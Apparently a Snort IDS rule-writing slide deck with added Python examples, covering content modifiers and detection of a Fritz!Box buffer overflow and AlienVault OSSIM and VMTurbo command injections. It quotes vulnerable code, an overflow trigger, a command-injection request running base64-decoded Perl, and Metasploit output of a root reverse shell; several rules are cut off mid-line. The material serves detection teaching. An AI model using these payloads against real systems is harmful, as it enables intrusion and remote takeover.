Introduction to Snort Rule Writing


  • Introduction to Snort Rule Writing

  • Snort Rule Syntax

    # rule header
    alert tcp any any -> 192.168.1.0/24 111 (

    Header fields, read left to right: rule action (alert), protocol (tcp), src address (any), src port (any), dst address (192.168.1.0/24), dst port (111).

  • Snort Rule Syntax

    # rule option format
    alert tcp any any -> 192.168.1.0/24 111 (
        msg:"Rule Message"; \

    Each option is written as rule option, colon, rule option argument, terminated by a semicolon: here msg is the rule option and "Rule Message" is its argument.

  • rule option: content

    # content match example
    alert tcp any any -> 192.168.1.0/24 111 (
        content:"ABCD"; \
        # is equivalent to:
        content:"|41 42 43 44|"; \

    The content match finds a static pattern in network data.

  • content modifiers: nocase

    # content match modifiers: nocase
    alert tcp any any -> 192.168.1.0/24 111 (
        # match "ABCD" or "abcd" etc.
        content:"ABCD"; nocase;

    nocase makes a content match case insensitive. content matches are case sensitive by default.

  • content modifiers: offset

    # content match modifiers: offset
    alert tcp any any -> 192.168.1.0/24 111 (
        # skip 2 bytes before searching for "ABCD"
        content:"ABCD"; offset:2;

    offset requires the match to occur after the designated offset in network data.

  • content modifiers: depth

    # content match modifiers: depth
    alert tcp any any -> 192.168.1.0/24 111 (
        # match "ABCD" within the first 4 bytes of the payload
        content:"ABCD"; depth:4;

    depth restricts how far Snort should search for the specified pattern.

  • content modifiers: distance

    # content match modifiers: distance
    alert tcp any any -> 192.168.1.0/24 111 (
        # find "DEF" 1 byte after "ABC"
        content:"ABC"; content:"DEF"; distance:1;

    distance specifies how far into a payload Snort should ignore before starting to search for the specified pattern, relative to the end of the previous pattern match.

  • content modifiers: within

    # content match modifiers: within
    alert tcp any any -> 192.168.1.0/24 111 (
        # find "EFG" within 10 bytes of "ABC"
        content:"ABC"; content:"EFG"; within:10;

    within makes sure that at most N bytes are between pattern matches.

  • negated content match

    # negated content match
    alert tcp any any -> 192.168.1.0/24 111 (
        # make sure "EFG" is NOT within 10 bytes of "ABC"
        content:"ABC"; content:!"EFG"; within:10;

    content matches can be negated.
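    An added example, not part of the original slides: a small Python evaluator that implements the offset, depth, distance, within, nocase and negated content semantics described on the preceding slides, so each modifier can be checked against constructed payloads. The modifier semantics follow the Snort manual as summarised above; match_contents and the rule constants are names chosen for this example.

```python
def match_contents(payload: bytes, contents: list) -> bool:
    """Evaluate a chain of content matches the way Snort does.

    Each entry is a dict with a "pattern" (bytes) and optional modifiers:
    nocase, negated, offset, depth (absolute, from the payload start) and
    distance, within (relative, from the end of the previous match).
    """
    cursor = 0  # byte just past the previous match (Snort's "doe_ptr")
    for c in contents:
        pat, hay = c["pattern"], payload
        if c.get("nocase"):
            pat, hay = pat.lower(), hay.lower()
        if c.get("distance") is not None or c.get("within") is not None:
            # relative modifiers: skip 'distance' bytes after the previous
            # match, and require the pattern to end within 'within' bytes
            start = cursor + (c.get("distance") or 0)
            stop = start + c["within"] if c.get("within") is not None else len(hay)
        else:
            # absolute modifiers: skip 'offset' bytes, search 'depth' bytes
            start = c.get("offset") or 0
            stop = start + c["depth"] if c.get("depth") is not None else len(hay)
        idx = hay.find(pat, start, stop)  # -1 unless the whole pattern fits in the window
        found = idx != -1
        if c.get("negated"):
            if found:
                return False  # a negated content fails when the pattern is present
            continue          # a passing negated match leaves the cursor alone
        if not found:
            return False
        cursor = idx + len(pat)
    return True


# The preceding slides' examples, written as content chains.
OFFSET_RULE = [{"pattern": b"ABCD", "offset": 2}]
DEPTH_RULE = [{"pattern": b"ABCD", "depth": 4}]
DISTANCE_RULE = [{"pattern": b"ABC"}, {"pattern": b"DEF", "distance": 1}]
WITHIN_RULE = [{"pattern": b"ABC"}, {"pattern": b"EFG", "within": 10}]
NEGATED_RULE = [{"pattern": b"ABC"}, {"pattern": b"EFG", "negated": True, "within": 10}]
NOCASE_RULE = [{"pattern": b"ABCD", "nocase": True}]

if __name__ == "__main__":
    # constructed payloads: one that satisfies each rule and one that does not
    print(match_contents(b"xxABCD", OFFSET_RULE), match_contents(b"ABCD", OFFSET_RULE))
    print(match_contents(b"ABCxDEF", DISTANCE_RULE), match_contents(b"ABCDEF", DISTANCE_RULE))
    print(match_contents(b"ABCxxEFG", NEGATED_RULE),
          match_contents(b"ABC" + b"x" * 8 + b"EFG", NEGATED_RULE))
```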

  • content buffers

    # content buffer example
    alert tcp any any -> 192.168.1.0/24 111 (
        # match "ABC" within the HTTP URI
        content:"ABC"; http_uri;

    content matches can be restricted to a payload location, such as the HTTP URI.

  • content buffers

    POST /index.php HTTP/1.1
    Host: example.com
    Content-Length: 28
    Content-Type: application/x-www-form-urlencoded
    Cookie: this_is_a_cookie=this_is_its_value

    firstparam=one&secondparam=two

    Buffers: http_method, http_uri, http_header, http_cookie, http_client_body

  • content modifiers: fast_pattern

    # fast_pattern example
    alert tcp any any -> 192.168.1.0/24 111 (
        # set "ABC" as the rule fast_pattern
        content:"ABC"; fast_pattern;

    fast_pattern explicitly specifies the content match within a rule to be used with the fast pattern matcher. The fast_pattern serves as the entrance condition for rule evaluation.

  • content modifiers: fast_pattern

    # fast_pattern:only; example
    alert tcp any any -> 192.168.1.0/24 111 (
        # set "ABC" as the rule fast_pattern
        content:"ABC"; fast_pattern:only;

    fast_pattern:only; selects the content match to be used in the fast pattern matcher for the rule and also specifies that this match will not be evaluated again when the rule enters.

  • rule option: pcre

    # pcre rule option example
    alert tcp any any -> 192.168.1.0/24 111 (
        # match the following regex
        pcre:"/A[BC]D/i"; \

    pcre declares a Perl compatible regular expression for matching on payload data. Flags can be specified after the closing slash, e.g. /i for case insensitivity.

  • Traffic Triage and Isolation

    [Diagram: a funnel that narrows high-volume traffic down to the vulnerability condition, applying the fast checks first and the slow checks last]

    Normal Traffic -> fast_pattern -> Vulnerable Application Traffic -> content, etc. -> Vulnerable Parameter Traffic -> pcre -> Vulnerability Condition

    Axes: Traffic Volume (high to low), Speed (fast to slow), Traffic Type

  • Detection Strategies

  • Detection Topics

    > Buffer Overflow
      Command Injection
      Directory Traversal
      Use-After-Free
      Remote File Include
      Browser Plugins
      Cross Site Scripting
      Malware Command Traffic

  • Buffer Overflow Overview

    Stack buffer overflow in AVM Fritz!Box daemon dsl_control.

    AVM Fritz!Box firmware fails to check the length of user supplied data in a 'se' or ScriptExecute command sent in a SOAP request to the dsl_control daemon.

  • Buffer Overflow Overview

    dsl_cpi_cli_access.c registers the command 'se' to the DSL_CPE_CLI_ScriptExecute handler function:

    [...]
    DSL_CPE_CLI_CMD_ADD_COMM (
        "se", "ScriptExecute", DSL_CPE_CLI_ScriptExecute, g_sSe);
    [...]

  • Buffer Overflow Overview

    DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute([...])
    {
        [...]
        DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0};

        if (DSL_CPE_CLI_CheckParamNumber(pCommands, 1, DSL_CLI_EQUALS) == DSL_FALSE)
        {
            return -1;
        }

        DSL_CPE_sscanf(pCommands, "%s", sFileName);
        [...]

  • Buffer Overflow Overview

    The code calls the function DSL_CPE_sscanf in order to copy the value of the parameter pCommands to the local character array sFileName without restriction or bounds checking. The size of the vulnerable stack buffer is 256 bytes as indicated in dsl_cpi_cli_console.h:

    #define DSL_MAX_COMMAND_LINE_LENGTH 256

    Triggering the vulnerability is then a simple matter of sending >256 bytes in the first 'se' parameter.

  • Buffer Overflow Exploit

    se "A"*300

    http://schemas.xmlsoap.org/soap/envelope/

  • Buffer Overflow Detection

    # vulnerable SOAP request
    # with at least 256 bytes
    # within #
    content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; \
    content:"\s*se\s[^

  • Buffer Overflow Detection

    alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 ( \
        msg:"SERVER-WEBAPP AVM FritzBox dsl_control stack buffer overflow attempt"; \
        flow:to_server,established; \
        content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; \
        content:"
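    An added Python check, not from the slides, that mirrors the triage structure of the rule above: the cheap DslCpeCliAccess string is tested first as the entrance condition, and only bodies that pass it are run through a regular expression looking for an 'se' command whose first parameter is at least 256 bytes, the size of sFileName. The SOAP envelope layout produced by soap_body is a constructed assumption rather than a captured Fritz!Box request, and soap_body, is_dsl_control_overflow and SE_PARAM are names chosen for this example.

```python
import re

FAST_PATTERN = b"DslCpeCliAccess"   # the rule's fast_pattern: cheap entrance condition
MAX_CMD_LINE = 256                  # DSL_MAX_COMMAND_LINE_LENGTH from dsl_cpi_cli_console.h

# 'se' at the start of the command text (or after whitespace / a closing '>'),
# then its first parameter, optionally quoted. sscanf "%s" stops at whitespace,
# so the parameter is a run of non-whitespace bytes; MAX_CMD_LINE of them already
# overflow sFileName once the terminating NUL is written.
SE_PARAM = re.compile(rb'(?:^|[\s>])se\s+"?([^\s"<]{%d,})' % MAX_CMD_LINE)


def is_dsl_control_overflow(http_body: bytes) -> bool:
    """Return True when the client body carries an 'se' command whose first
    parameter is at least MAX_CMD_LINE bytes long."""
    if FAST_PATTERN not in http_body:   # triage: most traffic drops out here
        return False
    return SE_PARAM.search(http_body) is not None


def soap_body(command: str) -> bytes:
    """Constructed SOAP envelope (an assumed layout, not a captured request)
    carrying a dsl_control command string."""
    return (
        b'<?xml version="1.0"?>'
        b'<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
        b"<s:Body><u:DslCpeCliAccess><cmd>" + command.encode() + b"</cmd>"
        b"</u:DslCpeCliAccess></s:Body></s:Envelope>"
    )


if __name__ == "__main__":
    benign = soap_body("se script.txt")
    overflow = soap_body('se "' + "A" * 300 + '"')  # the slide's se "A"*300
    print(is_dsl_control_overflow(benign), is_dsl_control_overflow(overflow))
```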


  • Detection Topics

      Buffer Overflow
    > Command Injection
      Directory Traversal
      Use-After-Free
      Remote File Include
      Browser Plugins
      Cross Site Scripting
      Malware Command Traffic

  • Command Injection Overview

    CVE-2014-3805

    Command injection vulnerabilities in AlienVault OSSIM av-centerd, which accepts SOAP commands on port 40007. SOAP command 'get_log_line' parameter '$number_lines' and 'get_license' parameter '$license_type' are used in OS commands without sanitization.

  • Command Injection Overview

    /usr/share/alienvault-center/lib/AV/CC/Util.pm

    sub get_log_line() {
        my ( $function_llamada, $name, $uuid, $admin_ip,
             $hostname, $r_file, $number_lines ) = @_;
        [...]
        # $number_lines used in OS command without sanitization
        my $command = "tail -$number_lines $r_file";
        my @content = `$command`;
        [...]
    }

  • Command Injection Overview

    /usr/share/alienvault-center/lib/AV/CC/Util.pm

    sub get_license() {
        my ( $function_llamada, $name, $uuid, $admin_ip,
             $hostname, $license, $license_type ) = @_;
        [...]
        # $license_type used in OS command without sanitization
        my $package = system ("curl --proxy-anyauth -K /etc/curlrc
            http://[...]/avl/$license_type/[...]");
    }

  • Command Injection Exploit

    POST /av-centerd HTTP/1.1
    Host: 172.16.8.223:40007
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 765
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "AV/CC/Util#get_log_line"

    All[...]&& perl -MMIME::Base64 -e 'system(decode_base64("cGVy[...]


  • Command Injection Exploit

    msf exploit(alienvault_centerd_soap_exec) > exploit

    [*] Started reverse handler on 172.16.158.1:4444
    [*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500

    id
    uid=0(root) gid=0(root) groups=0(root)

    remember traffic isolation...

  • Command Injection Detection

    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \
        msg:"SERVER-WEBAPP AlienVault OSSIM get_log_line command injection attempt"; \
        flow:to_server,established; \
        content:"/av-centerd"; nocase; http_uri; \
        content:"]*?>[^

  • Command Injection Detection

    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \
        msg:"SERVER-WEBAPP AlienVault OSSIM get_license command injection attempt"; \
        flow:to_server,established; \
        content:"/av-centerd"; nocase; http_uri; \
        content:"]*?>[^

  • Command Injection Overview

    CVE-2014-5073

    OS command injection vulnerability in VMTurbo Operations Manager vmtadmin.cgi parameter 'fileDate'. If the 'callType' parameter is set to "DOWN", vmtadmin.cgi will pass the value of 'fileDate' to system().

  • Command Injection Overview

    my $actiontype = $query->param("ac